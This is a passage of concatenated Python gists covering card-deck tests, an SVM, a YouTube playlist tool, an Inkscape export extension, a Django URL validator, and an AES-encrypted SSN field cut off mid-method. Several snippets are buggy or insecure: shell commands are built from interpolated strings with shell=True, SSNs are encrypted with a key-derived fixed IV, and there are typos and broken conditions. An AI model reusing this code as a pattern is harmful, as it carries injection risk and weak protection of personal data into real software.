Card(RANKS['Two'], SUITS['Hearts']),
Card(RANKS['Seven'], SUITS['Spades']),
Card(RANKS['Ace'], SUITS['Diamonds']), ]
self.deck = CardCollection(self.collection)
def test_top_card_returns_the_top_card(self):
self.assertEqual(self.collection[-1], self.deck.top_card())
def test_bottom_card_returns_the_bottom_card(self):
self.assertEqual(self.collection[0], self.deck.bottom_card())
def test_add_card_appends_card_to_deck(self):
added_card = Card(RANKS['King'], SUITS['Diamonds'])
self.deck.add(added_card)
self.assertEqual(self.deck.top_card(), added_card)
def test_draw_from_top_removes_top_card_and_returns_it(self):
self.assertEqual(self.deck.draw_from_top(), self.collection[-1])
self.assertEqual(self.collection[-2], self.deck.top_card())
def test_draw_from_bottom_removes_bottom_card_and_returns_it(self):
self.assertEqual(self.deck.draw_from_bottom(), self.collection[0])
self.assertEqual(self.collection[1], self.deck.bottom_card())
def test_index_returns_index_of_card(self):
self.assertEqual(self.deck.index(self.collection[3]), 3)
def test_index_return_first_occurences_of_card(self):
self.assertEqual(self.deck.index(self.collection[4]), 0)
def test_index_throws_value_error_if_item_is_missing(self):
missing_card = Card(RANKS['Five'], SUITS['Spades'])
self.assertRaises(ValueError, self.deck.index, missing_card)
def test_is_iterable(self):
self.assertIsInstance(self.deck, collections.Iterable)
def test_is_indexable(self):
self.assertTrue('__getitem__' in dir(self.deck))
class StandardDecksTest(unittest.TestCase):
def generate_list_of_cards(self, ranks):
return []
def test_standard_deck(self):
standard_deck = ['King of Diamonds',
'Queen of Diamonds',
'Jack of Diamonds',
'Ten of Diamonds',
'Nine of Diamonds',
'Eight of Diamonds',
'Seven of Diamonds',
'Six of Diamonds',
'Five of Diamonds',
'Four of Diamonds',
'Three of Diamonds',
'Two of Diamonds',
'Ace of Diamonds',
'King of Clubs',
'Queen of Clubs',
'Jack of Clubs',
'Ten of Clubs',
'Nine of Clubs',
'Eight of Clubs',
'Seven of Clubs',
'Six of Clubs',
'Five of Clubs',
'Four of Clubs',
'Three of Clubs',
'Two of Clubs',
'Ace of Clubs',
'King of Hearts',
'Queen of Hearts',
'Jack of Hearts',
'Ten of Hearts',
'Nine of Hearts',
'Eight of Hearts',
'Seven of Hearts',
'Six of Hearts',
'Five of Hearts',
'Four of Hearts',
'Three of Hearts',
'Two of Hearts',
'Ace of Hearts',
'King of Spades',
'Queen of Spades',
'Jack of Spades',
'Ten of Spades',
'Nine of Spades',
'Eight of Spades',
'Seven of Spades',
'Six of Spades',
'Five of Spades',
'Four of Spades',
'Three of Spades',
'Two of Spades',
'Ace of Spades']
self.assertSequenceEqual([str(card) for card in StandardDeck()],
standard_deck)
def test_belote_deck(self):
belotte_deck = ['King of Diamonds',
'Queen of Diamonds',
'Jack of Diamonds',
'Ten of Diamonds',
'Nine of Diamonds',
'Eight of Diamonds',
'Seven of Diamonds',
'Ace of Diamonds',
'King of Clubs',
'Queen of Clubs',
'Jack of Clubs',
'Ten of Clubs',
'Nine of Clubs',
'Eight of Clubs',
'Seven of Clubs',
'Ace of Clubs',
'King of Hearts',
'Queen of Hearts',
'Jack of Hearts',
'Ten of Hearts',
'Nine of Hearts',
'Eight of Hearts',
'Seven of Hearts',
'Ace of Hearts',
'King of Spades',
'Queen of Spades',
'Jack of Spades',
'Ten of Spades',
'Nine of Spades',
'Eight of Spades',
'Seven of Spades',
'Ace of Spades']
self.assertSequenceEqual([str(card) for card in BeloteDeck()],
belotte_deck)
def test_sixtysix_deck(self):
sixtysix_deck = ['King of Diamonds',
'Queen of Diamonds',
'Jack of Diamonds',
'Ten of Diamonds',
'Nine of Diamonds',
'Ace of Diamonds',
'King of Clubs',
'Queen of Clubs',
'Jack of Clubs',
'Ten of Clubs',
'Nine of Clubs',
'Ace of Clubs',
'King of Hearts',
'Queen of Hearts',
'Jack of Hearts',
'Ten of Hearts',
'Nine of Hearts',
'Ace of Hearts',
'King of Spades',
'Queen of Spades',
'Jack of Spades',
'Ten of Spades',
'Nine of Spades',
'Ace of Spades']
self.assertSequenceEqual([str(card) for card in SixtySixDeck()],
sixtysix_deck)
if __name__ == '__main__':
unittest.main()
```
#### File: hard-gists/977777/snippet.py
```python
from twisted.internet import reactor, defer
class Api:
def __init__(self):
self.domainObjects = None
self.subscribers = []
def test(self, url):
# code for doing the async stuff here
d = defer.Deferred()
d.addCallback(self.asyncFinishedHandler)
reactor.callLater(3, d.callback, 100)
def asyncFinishedHandler(self, response):
# parse response into domain objects
parseResults = self.parse(response)
self.domainObjects = parseResults
self.__raiseDoneEvent()
def __raiseDoneEvent(self):
for s in self.subscribers:
s()
def parse(self, response):
return response
def subscribeToDoneEvent(self, subscriber):
self.subscribers.append(subscriber)
def main():
a = Api()
def doneEventHandler():
print a.domainObjects
a.subscribeToDoneEvent(doneEventHandler)
a.test("something")
reactor.callLater(4, reactor.stop)
reactor.run()
if __name__ == "__main__":
main()
```
#### File: hard-gists/97cffbea574a5890f0d7/snippet.py
```python
import numpy as np
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.utils import check_random_state
from sklearn.preprocessing import LabelEncoder
def projection_simplex(v, z=1):
"""
Projection onto the simplex:
w^* = argmin_w 0.5 ||w-v||^2 s.t. \sum_i w_i = z, w_i >= 0
"""
# For other algorithms computing the same projection, see
# https://gist.github.com/mblondel/6f3b7aaad90606b98f71
n_features = v.shape[0]
u = np.sort(v)[::-1]
cssv = np.cumsum(u) - z
ind = np.arange(n_features) + 1
cond = u - cssv / ind > 0
rho = ind[cond][-1]
theta = cssv[cond][-1] / float(rho)
w = np.maximum(v - theta, 0)
return w
class MulticlassSVM(BaseEstimator, ClassifierMixin):
def __init__(self, C=1, max_iter=50, tol=0.05,
random_state=None, verbose=0):
self.C = C
self.max_iter = max_iter
self.tol = tol,
self.random_state = random_state
self.verbose = verbose
def _partial_gradient(self, X, y, i):
# Partial gradient for the ith sample.
g = np.dot(X[i], self.coef_.T) + 1
g[y[i]] -= 1
return g
def _violation(self, g, y, i):
# Optimality violation for the ith sample.
smallest = np.inf
for k in range(g.shape[0]):
if k == y[i] and self.dual_coef_[k, i] >= self.C:
continue
elif k != y[i] and self.dual_coef_[k, i] >= 0:
continue
smallest = min(smallest, g[k])
return g.max() - smallest
def _solve_subproblem(self, g, y, norms, i):
# Prepare inputs to the projection.
Ci = np.zeros(g.shape[0])
Ci[y[i]] = self.C
beta_hat = norms[i] * (Ci - self.dual_coef_[:, i]) + g / norms[i]
z = self.C * norms[i]
# Compute projection onto the simplex.
beta = projection_simplex(beta_hat, z)
return Ci - self.dual_coef_[:, i] - beta / norms[i]
def fit(self, X, y):
n_samples, n_features = X.shape
# Normalize labels.
self._label_encoder = LabelEncoder()
y = self._label_encoder.fit_transform(y)
# Initialize primal and dual coefficients.
n_classes = len(self._label_encoder.classes_)
self.dual_coef_ = np.zeros((n_classes, n_samples), dtype=np.float64)
self.coef_ = np.zeros((n_classes, n_features))
# Pre-compute norms.
norms = np.sqrt(np.sum(X ** 2, axis=1))
# Shuffle sample indices.
rs = check_random_state(self.random_state)
ind = np.arange(n_samples)
rs.shuffle(ind)
violation_init = None
for it in range(self.max_iter):
violation_sum = 0
for ii in range(n_samples):
i = ind[ii]
# All-zero samples can be safely ignored.
if norms[i] == 0:
continue
g = self._partial_gradient(X, y, i)
v = self._violation(g, y, i)
violation_sum += v
if v < 1e-12:
continue
# Solve subproblem for the ith sample.
delta = self._solve_subproblem(g, y, norms, i)
# Update primal and dual coefficients.
self.coef_ += (delta * X[i][:, np.newaxis]).T
self.dual_coef_[:, i] += delta
if it == 0:
violation_init = violation_sum
vratio = violation_sum / violation_init
if self.verbose >= 1:
print("iter", it + 1, "violation", vratio)
if vratio < self.tol:
if self.verbose >= 1:
print("Converged")
break
return self
def predict(self, X):
decision = np.dot(X, self.coef_.T)
pred = decision.argmax(axis=1)
return self._label_encoder.inverse_transform(pred)
if __name__ == '__main__':
from sklearn.datasets import load_iris
iris = load_iris()
X, y = iris.data, iris.target
clf = MulticlassSVM(C=0.1, tol=0.01, max_iter=100, random_state=0, verbose=1)
clf.fit(X, y)
print(clf.score(X, y))
```
#### File: hard-gists/982ce339d5f8c9a769a0/snippet.py
```python
import pandas as pd
import numpy as np
from sklearn.feature_extraction import DictVectorizer
def encode_onehot(df, cols):
"""
One-hot encoding is applied to columns specified in a pandas DataFrame.
Modified from: https://gist.github.com/kljensen/5452382
Details:
http://en.wikipedia.org/wiki/One-hot
http://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.OneHotEncoder.html
@param df pandas DataFrame
@param cols a list of columns to encode
@return a DataFrame with one-hot encoding
"""
vec = DictVectorizer()
vec_data = pd.DataFrame(vec.fit_transform(df[cols].to_dict(outtype='records')).toarray())
vec_data.columns = vec.get_feature_names()
vec_data.index = df.index
df = df.drop(cols, axis=1)
df = df.join(vec_data)
return df
def main():
np.random.seed(42)
df = pd.DataFrame(np.random.randn(25, 3), columns=['a', 'b', 'c'])
# Make some random categorical columns
df['e'] = [random.choice(('Chicago', 'Boston', 'New York')) for i in range(df.shape[0])]
df['f'] = [random.choice(('Chrome', 'Firefox', 'Opera', "Safari")) for i in range(df.shape[0])]
# Vectorize the categorical columns: e & f
df = encode_onehot(df, cols=['e', 'f'])
print df.head()
if __name__ == '__main__':
main()
```
#### File: hard-gists/9874480/snippet.py
```python
import httplib2
import os
import sys
from apiclient.discovery import build
# from apiclient.errors import HttpError
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import run
from urlparse import urlparse, parse_qs
import re
from docopt import docopt
import fileinput
# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains
# the OAuth 2.0 information for this application, including its client_id and
# client_secret. You can acquire an OAuth 2.0 client ID and client secret from
# the Google Cloud Console at
# https://cloud.google.com/console.
# Please ensure that you have enabled the YouTube Data API for your project.
# For more information about using OAuth2 to access the YouTube Data API, see:
# https://developers.google.com/youtube/v3/guides/authentication
# For more information about the client_secrets.json file format, see:
# https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
CLIENT_SECRETS_FILE = "client_secrets.json"
# This variable defines a message to display if the CLIENT_SECRETS_FILE is
# missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the Cloud Console
https://cloud.google.com/console
For more information about the client_secrets.json file format, please visit:
https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
""" % os.path.abspath(os.path.join(os.path.dirname(__file__),
CLIENT_SECRETS_FILE))
# This OAuth 2.0 access scope allows for full read/write access to the
# authenticated user's account.
YOUTUBE_SCOPE = "https://www.googleapis.com/auth/youtube"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
def video_id(url):
"""
Examples:
- http://youtu.be/SA2iWivDJiE
- http://www.youtube.com/watch?v=_oPAwA_Udwc&feature=feedu
- http://www.youtube.com/embed/SA2iWivDJiE
- http://www.youtube.com/v/SA2iWivDJiE?version=3&hl=en_US
- www.youtube.com/embed/SA2iWivDJiE
- http://youtu.be.com/SA2iWivDJiE
- youtube.com/embed/SA2iWivDJiE
- SA2iWivDJiE
From http://stackoverflow.com/a/7936523
Edited to support optional url scheme and only video_id
"""
query = urlparse(url)
if not query.scheme:
url = "http://" + url
query = urlparse(url)
#http://stackoverflow.com/q/6344993
if query.hostname == 'youtu.be':
return query.path[1:]
if query.hostname in ('www.youtube.com', 'youtube.com'):
if query.path == '/watch':
p = parse_qs(query.query)
return p['v'][0]
if query.path[:7] == '/embed/':
return query.path.split('/')[2]
if query.path[:3] == '/v/':
return query.path.split('/')[2]
#match for a video_id as a argument
if re.match('[a-zA-Z0-9_-]{11}', url):
return url
return None
def get_authenticated_service():
flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE, scope=YOUTUBE_SCOPE,
message=MISSING_CLIENT_SECRETS_MESSAGE)
storage = Storage("%s-oauth2.json" % sys.argv[0])
credentials = storage.get()
if credentials is None or credentials.invalid:
credentials = run(flow, storage)
return build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
http=credentials.authorize(httplib2.Http()))
def get_videos_from_playlist(youtube, items, playlistID):
response = items.list(part="snippet", playlistId=playlistID)
while response:
playlistitems_list_response = response.execute()
for playlist_item in playlistitems_list_response["items"]:
# title = playlist_item["snippet"]["title"]
video_id = playlist_item["snippet"]["resourceId"]["videoId"]
yield video_id
response = youtube.playlistItems().list_next(
response, playlistitems_list_response)
def add_video_to_playlist(youtube,playlistID, videoID):
items = youtube.playlistItems()
playlist = get_videos_from_playlist(youtube, items, playlistID)
if videoID not in playlist:
add_video_request=items.insert(
part="snippet",
body={
'snippet': {
'playlistId': playlistID,
'resourceId': {
'kind': 'youtube#video',
'videoId': videoID
}
#'position': 0
}
}
).execute()
return add_video_request
print "Already on Playlist"
return None
def add_file_to_playlist(youtube, playlistID, finput):
for line in finput:
videoID = video_id(line.strip())
try:
add_video_to_playlist(youtube, playlistID, videoID)
except Exception, e:
print "Couldn't add video: {0}\n{1}\n".format(videoID, e)
if __name__ == '__main__':
docs = \
"""Add to youtube playlist
Usage:
add2ytpl.py add <playlistID> <videoID>...
add2ytpl.py addFile <playlistID> [#...]
add2ytpl.py (-h | --help)
Options:
-h --help Show this screen.
"""
args = docopt(docs)
# print(args)
youtube = get_authenticated_service()
if args['add']:
for video in args['<videoID>']:
add_video_to_playlist(youtube, args['<playlistID>'], video_id(video))
if args['addFile']:
f = fileinput.input(args['#'])
add_file_to_playlist(youtube, args['<playlistID>'], f)
```
#### File: hard-gists/989074/snippet.py
```python
import inkex
import sys, os, commands,subprocess
import string
from xml.dom.minidom import Document
from xml.dom.minidom import DocumentType
# This line is only needed if you don't put the script directly into
# the installation directory
#sys.path.append('/usr/share/inkscape/extensions')
# The simplestyle module provides functions for style parsing.
from simplestyle import *
# Generic class to handle object meta data.
class imageMetaData():
id = ""
background = ""
width = ""
height = ""
path = ""
area = ""
x = 0
y = 0
# Effect main class
class ExportToAny(inkex.Effect):
parserProcessHandle = None
saveLocation = ""
where = ""
what = ""
svg_file = ""
renderHistory = []
def __init__(self):
"""
Constructor.
Defines the "--what" option of a script.
"""
# Call the base class constructor.
inkex.Effect.__init__(self)
# The OptionParser stuff below are Inkscape specific code which sets up the dialog for the extension GUI.
# The current options are just lab stuff and should be substituted with something more usefull.
# Define string option "--what" with "-w" shortcut.
self.OptionParser.add_option('-w', '--what', action = 'store',
type = 'string', dest = 'what', default = 'World',
help = '')
self.OptionParser.add_option('--where', action = 'store',
type = 'string', dest = 'where', default = 'c:\\',
help = 'Where to save?')
# exportImage takes as argument the current svg element id. This is then used to select which element the Inkscape exe should export.
def exportImage(self,id,parent_id):
# The easiest way to name rendered elements is by using their id since we can trust that this is always unique.
# The id will later be used as reference by the canvas document (html, ddh, css, ...)
filename = os.path.join(self.where, id+'.png')
# Inkscape has many really usefull cmd line arguments which can be used to query for data, and render bitmaps.
# Please not that Inkscape supports shell execution and should really be started as such at the beginning of parsing.
# The shell spawning stuff is commented out at the bottom of this script.
# The current command will start/close a new instance of the app for every element parsed.
command = "inkscape --without-gui --export-area-snap --export-id %s --export-png %s %s " % (id, filename, self.svg_file) #create the command that will be use to export
processHandle = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE)
# Inkscape is gracious enough to return some metadata regarding the exported bitmap.
stdout_value = processHandle.communicate()[0]
# Inkscapes element metadata is not a pleasant format. parseImageMetaData data tries to remedy this.
imageMetaData = self.parseImageMetaData(
str(stdout_value)
)
return ((id + ";" + parent_id) + (";" + imageMetaData))
# exportImage takes as argument the current svg element id. This is then used to select which element the Inkscape exe should export.
def getImage(self,id,parent_id):
# Inkscape has many really useful cmd line arguments which can be used to query for data, and render bitmaps.
# Please not that Inkscape supports shell execution and should really be started as such at the beginning of parsing.
# The shell spawning stuff is commented out at the bottom of this script.
# The current command will start/close a new instance of the app for every element parsed.
command = "inkscape --without-gui --export-area-snap --export-id %s --export-png %s %s " % (id, filename, self.svg_file) #create the command that will be use to export
processHandle = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE)
# Inkscape is gracious enough to return some metadata regarding the exported bitmap.
stdout_value = processHandle.communicate()[0]
# Inkscapes element metadata is not a pleasant format. parseImageMetaData data tries to remedy this.
imageMetaData = self.parseImageMetaData(
str(stdout_value)
)
return ((id + ";" + parent_id) + (";" + imageMetaData))
def parseImageMetaData(self,metaDataString):
# Inkscape exports information about svg objects in a pretty ugly format. Lets do a quick and dirty solution to this problem :)
# NOTE: The input format of the metaDataString may very well change in future Inkscape releases.
if(metaDataString != ''):
metaDataString = metaDataString.replace('Background RRGGBBAA: ','')
metaDataString = metaDataString.replace('Area ',';')
metaDataString = metaDataString.replace(' exported to ',';')
metaDataString = metaDataString.replace('Bitmap saved as: ','')
metaDataString = metaDataString.replace(' x ',';')
metaDataString = metaDataString.replace(' pixels (90 dpi)',';')
metaDataString += ''
return metaDataString
# parseDoc is the first level of parsing.
def parseDoc(self):
# As you can see in the xpath query below we select all groups at the first level of the document.
layers = self.document.xpath('//svg:svg/svg:g',namespaces=inkex.NSS)
# For each group (which at this level is actually an Inkscape layer) call parseLayer.
for node in layers:
layerStr = self.exportImage(node.get('id'),'svg')
self.debugLogger(layerStr)
self.parseLayer(node)
def parseLayer(self,rootElement):
# I have chosen to call the level above layer "panel".
panels = rootElement.xpath('svg:g',namespaces=inkex.NSS)
# Hey ho here we go
for node in panels:
self.parsePanel(node)
def parsePanel(self,rootElement):
# A panel is an area of the layer which we want to define. This area will not be rendered as a bitmap but saved as model data to be used when
# rendering the canvas document (html, ddh, ...)
elements = rootElement.xpath('svg:g',namespaces=inkex.NSS)
#self.debugLogger(len(elements))
# Loop through all *grouped elements*, which will be rendered as png bitmaps. Ungrouped elements will be ignored.
for node in elements:
self.parseElement(node)
def parseElement(self,node):
element_metadata = ""
id = node.get('id')
# Do actual export
element_metadata = self.exportImage(id,'svg')
element_metadata = element_metadata.split(';')
element_metadata[3] = element_metadata[3].split(':')
# Assign the element_metadata values to an elementData struct which we later can query for element data. This will be used for rendering of content documents.
elementData = {
'id':element_metadata[0],
'parent_id':element_metadata[1],
'background': element_metadata[2],
'area':{
'x':element_metadata[3][0],
'y':element_metadata[3][1],
'rel_x':element_metadata[3][2],
'rel_y':element_metadata[3][3]
},
'width':element_metadata[4],
'height':element_metadata[5],
'path':element_metadata[6]
}
# Here we simply add the new struct to the renderHistory array.
self.renderHistory.append(elementData)
# And just for debug sake write some stuff back to the document.
#self.debugLogger(self.renderHistory[0]['id'])
# Sub-optimal function just as "proof-of-concept"
def renderDDHDoc(self):
bitmapSchemaString = ''
bitmapDBString = ''
ddhDocString = ''
iterator = 0
# Ok lets render the bitmap schema section of the ddh
bitmapSchemaString = '<BitmapSchema><SchemaId>1</SchemaId><DayMode><BitmapDirectory>%s</BitmapDirectory>'%(self.where)
for node in self.renderHistory:
bitmapSchemaString += '<Bitmap>\n<BitmapId>%s</BitmapId>\n<DefaultBitmapFileName>%s</DefaultBitmapFileName>\n</Bitmap>\n'%(node['id'],node['path'].replace('\n',''))
# Add the end tag
bitmapSchemaString += '</BitmapSchema>\n'
# --------------------------------------------------------------------------------------------------------------------------------
# Ok lets render the bitmap database section of the ddh
for node in self.renderHistory:
iterator = iterator + 1
bitmapDBString += '<Bitmap ddh:Name="%s">\n<BitmapId>%s</BitmapId>\n<BitmapRenderValue>FixedSize</BitmapRenderValue>\n</Bitmap>\n'%(iterator,node['id'])
ddhDocString = ('<BitmapDatabase ddh:NextIdForDatabase="">\n' + bitmapSchemaString + bitmapDBString + '</BitmapDatabase>')
# Let's create a file and write it to disk.
filename = os.path.join(self.where, "ddh_sections.xml")
# Create a file object:
# in "write" mode
FILE = open(filename,"w")
FILE.write(ddhDocString)
FILE.close()
#self.debugLogger(ddhDocString)
# Sub-optimal function just as "proof-of-concept"
def renderCSSDoc(self):
docString = ''
iterator = 0
# Ok lets render the bitmap schema section of the ddh
docString = '<style>\n'
topPos = 0
for node in self.renderHistory:
topPos = 1#(node['area']['y'] + node['height'])
docString += '.%s {position:relative;top:%spx;left:%spx;}\n'%(node['id'],topPos,node['area']['y'])
# Add the end tag
docString += '</style>\n'
# --------------------------------------------------------------------------------------------------------------------------------
# Let's create a file and write it to disk.
filename = os.path.join(self.where, "css.css")
# Create a file object:
# in "write" mode
FILE = open(filename,"w")
FILE.write(docString)
FILE.close()
#self.debugLogger(docString)
def effect(self):
"""
Effect behaviour.
Overrides base class method
"""
self.svg_file = self.args[-1]
# Get script's "--what" option value.
self.what = self.options.what
# Get script's "--where" option value.
self.where = self.options.where
# Get the handle for the parser process. In this case Inkscape is used.
#self.parserProcessHandle = self.getParserSession()
self.parseDoc()
self.renderCSSDoc()
#self.endParserSession()
def debugLogger(self,textStr):
debugLayer = self.document.xpath('//svg:svg/svg:g',namespaces=inkex.NSS)[0]
# Create text element
text = inkex.etree.Element(inkex.addNS('text','svg'))
text.text = str(textStr)
# Set text position to center of document.
text.set('x', str(300 / 2))
text.set('y', str(300 / 2))
# Center text horizontally with CSS style.
style = {'text-align' : 'center', 'text-anchor': 'middle'}
text.set('style', formatStyle(style))
# Connect elements together.
debugLayer.append(text)
# Create effect instance and apply it.
effect = ExportToAny()
effect.affect()
"""
def getParserSession(self):
command = "inkscape --shell"
processHandle = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
return processHandle
def endParserSession(self):
command = "exit"
stdout_value = self.parserProcessHandle.communicate(command)
return repr(stdout_value)
"""
```
#### File: hard-gists/98b7edca1b29c949fcf1/snippet.py
```python
import argparse
import cv2
import numpy as np
def calc_disparity(left_image, right_image):
window_size = 3
min_disp = 1
num_disp = 16*2
stereo = cv2.StereoSGBM(
minDisparity=min_disp,
numDisparities=num_disp,
SADWindowSize=window_size,
uniquenessRatio=10,
speckleWindowSize=100,
speckleRange=32,
disp12MaxDiff=1,
P1=8*3*window_size**2,
P2=32*3*window_size**2,
fullDP=False
)
return stereo.compute(left_image, right_image).astype(np.float32) / 16.0
def remove_invalid(disp_arr, points, colors):
mask = (
(disp_arr > disp_arr.min()) &
np.all(~np.isnan(points), axis=1) &
np.all(~np.isinf(points), axis=1)
)
return points[mask], colors[mask]
def calc_point_cloud(image, disp, q):
points = cv2.reprojectImageTo3D(disp, q).reshape(-1, 3)
colors = image.reshape(-1, 3)
return remove_invalid(disp.reshape(-1), points, colors)
def project_points(points, colors, r, t, k, dist_coeff, width, height):
projected, _ = cv2.projectPoints(points, r, t, k, dist_coeff)
xy = projected.reshape(-1, 2).astype(np.int)
mask = (
(0 <= xy[:, 0]) & (xy[:, 0] < width) &
(0 <= xy[:, 1]) & (xy[:, 1] < height)
)
return xy[mask], colors[mask]
def calc_projected_image(points, colors, r, t, k, dist_coeff, width, height):
xy, cm = project_points(points, colors, r, t, k, dist_coeff, width, height)
image = np.zeros((height, width, 3), dtype=colors.dtype)
image[xy[:, 1], xy[:, 0]] = cm
return image
def rotate(arr, anglex, anglez):
return np.array([ # rx
[1, 0, 0],
[0, np.cos(anglex), -np.sin(anglex)],
[0, np.sin(anglex), np.cos(anglex)]
]).dot(np.array([ # rz
[np.cos(anglez), 0, np.sin(anglez)],
[0, 1, 0],
[-np.sin(anglez), 0, np.cos(anglez)]
])).dot(arr)
def run(left_image, right_image, focal_length, tx):
image = right_image
height, width, _ = image.shape
disp = calc_disparity(left_image, right_image)
q = np.array([
[1, 0, 0, -width/2],
[0, 1, 0, -height/2],
[0, 0, 0, focal_length],
[0, 0, -1/tx, 0]
])
points, colors = calc_point_cloud(image, disp, q)
r = np.eye(3)
t = np.array([0, 0, -100.0])
k = np.array([
[focal_length, 0, width/2],
[0, focal_length, height/2],
[0, 0, 1]
])
dist_coeff = np.zeros((4, 1))
def view(r, t):
cv2.imshow('projected', calc_projected_image(
points, colors, r, t, k, dist_coeff, width, height
))
view(r, t)
angles = { # x, z
'w': (-np.pi/6, 0),
's': (np.pi/6, 0),
'a': (0, np.pi/6),
'd': (0, -np.pi/6)
}
while 1:
key = cv2.waitKey(0)
if key not in range(256):
continue
ch = chr(key)
if ch in angles:
ax, az = angles[ch]
r = rotate(r, -ax, -az)
t = rotate(t, ax, az)
view(r, t)
elif ch == '\x1b': # esc
cv2.destroyAllWindows()
break
def main():
parser = argparse.ArgumentParser()
parser.add_argument('left_image')
parser.add_argument('right_image')
parser.add_argument('focal_length', type=float)
parser.add_argument('distance_between_cameras', type=float)
args = parser.parse_args()
left_image = cv2.imread(args.left_image)
right_image = cv2.imread(args.right_image)
f = args.focal_length
tx = args.distance_between_cameras
run(left_image, right_image, f, tx)
if __name__ == '__main__':
main()
```
#### File: hard-gists/9952389/snippet.py
```python
import os
import sae
import web
import json
import urllib2
urls=('/','Index','/xiami/(.+)','Xiami')
class Index:
def GET(self):
web.redirect('http://miantiao.me')
class Xiami:
def GET(self,id):
id=str(id.replace('.mp3',''))
request = urllib2.Request(''.join(['http://www.xiami.com/app/iphone/song/id/',id]))
request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X; en-us) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53')
request.add_header('Referer', ''.join(['http://www.xiami.com/app/iphone/song/id/',id]))
response = urllib2.urlopen(request)
info=json.loads(response.read())
url=info['location']
web.seeother(url)
app = web.application(urls, globals()).wsgifunc()
application = sae.create_wsgi_app(app)
```
#### File: hard-gists/998722/snippet.py
```python
import platform
import re
import urllib2
import urlparse
from django.core.exceptions import ValidationError
from django.core.validators import RegexValidator
from django.core.urlresolvers import resolve
from django.http import Http404
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import smart_unicode
try:
from django.conf import settings
URL_VALIDATOR_USER_AGENT = settings.URL_VALIDATOR_USER_AGENT
except ImportError:
# It's OK if Django settings aren't configured.
URL_VALIDATOR_USER_AGENT = 'Django (http://www.djangoproject.com/)'
class RelativeURLValidator(RegexValidator):
""" Validator which allows for relative URL's as well. """
regex = re.compile(
r'^((?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
r'localhost|' #localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE) # host is optional, allow for relative URLs
def __init__(self, verify_exists=False, validator_user_agent=URL_VALIDATOR_USER_AGENT):
super(RelativeURLValidator, self).__init__()
self.verify_exists = verify_exists
self.user_agent = validator_user_agent
def __call__(self, value):
try:
super(RelativeURLValidator, self).__call__(value)
except ValidationError, e:
# Trivial case failed. Try for possible IDN domain
if value:
value = smart_unicode(value)
scheme, netloc, path, query, fragment = urlparse.urlsplit(value)
try:
netloc = netloc.encode('idna') # IDN -> ACE
except UnicodeError: # invalid domain part
raise e
url = urlparse.urlunsplit((scheme, netloc, path, query, fragment))
super(RelativeURLValidator, self).__call__(url)
else:
raise
else:
url = value
if self.verify_exists:
broken_error = ValidationError(
_(u'This URL appears to be a broken link.'), code='invalid_link')
if url.startswith('http://') or url.startswith('ftp://'):
headers = {
"Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
"Accept-Language": "en-us,en;q=0.5",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Connection": "close",
"User-Agent": self.user_agent,
}
url = url.encode('utf-8')
try:
req = urllib2.Request(url, None, headers)
req.get_method = lambda: 'HEAD'
#Create an opener that does not support local file access
opener = urllib2.OpenerDirector()
#Don't follow redirects, but don't treat them as errors either
error_nop = lambda *args, **kwargs: True
http_error_processor = urllib2.HTTPErrorProcessor()
http_error_processor.http_error_301 = error_nop
http_error_processor.http_error_302 = error_nop
http_error_processor.http_error_307 = error_nop
handlers = [urllib2.UnknownHandler(),
urllib2.HTTPHandler(),
urllib2.HTTPDefaultErrorHandler(),
urllib2.FTPHandler(),
http_error_processor]
try:
import ssl
handlers.append(urllib2.HTTPSHandler())
except:
#Python isn't compiled with SSL support
pass
map(opener.add_handler, handlers)
if platform.python_version_tuple() >= (2, 6):
opener.open(req, timeout=10)
else:
opener.open(req)
except ValueError:
raise ValidationError(_(u'Enter a valid URL.'), code='invalid')
except: # urllib2.URLError, httplib.InvalidURL, etc.
raise broken_error
else:
# Resolve the relative URL
try:
resolve(url)
except Http404:
raise broken_error
```
#### File: hard-gists/999228/snippet.py
```python
from Crypto.Cipher import AES
import binascii
import re
ssn_re = re.compile(r"^\d{3}[-\ ]?\d{2}[-\ ]?\d{4}$")
class EncryptedSSNField(models.CharField):
description = _('Adds transparent encryption/decryption (AES256 using pyCrypto) for US Social Security Numbers in the database.')
__metaclass__ = models.SubfieldBase
def __init__(self, *args, **kwargs):
kwargs['max_length'] = 64
super(EncryptedSSNField, self).__init__(*args, **kwargs)
def to_python(self, value):
if value is u'' or '' or None:
return unicode(value)
else:
encobj1 = AES.new(settings.SECRET_KEY[:32], AES.MODE_CBC, settings.SECRET_KEY[34:50])
encobj2 = AES.new(settings.SECRET_KEY[:32], AES.MODE_CBC, settings.SECRET_KEY[34:50])
dec1 = encobj1.decrypt(binascii.a2b_hex(value))
dec2 = encobj2.decrypt(binascii.a2b_hex(dec1))
return unicode(dec2.rstrip())
def get_prep_value(self, value):
encobj1 = AES.new(settings.SECRET_KEY[:32], AES.MODE_CBC, settings.SECRET_KEY[34:50])
encobj2 = AES.new(settings.SECRET_KEY[:32], AES.MODE_CBC, settings.SECRET_KEY[34:50])
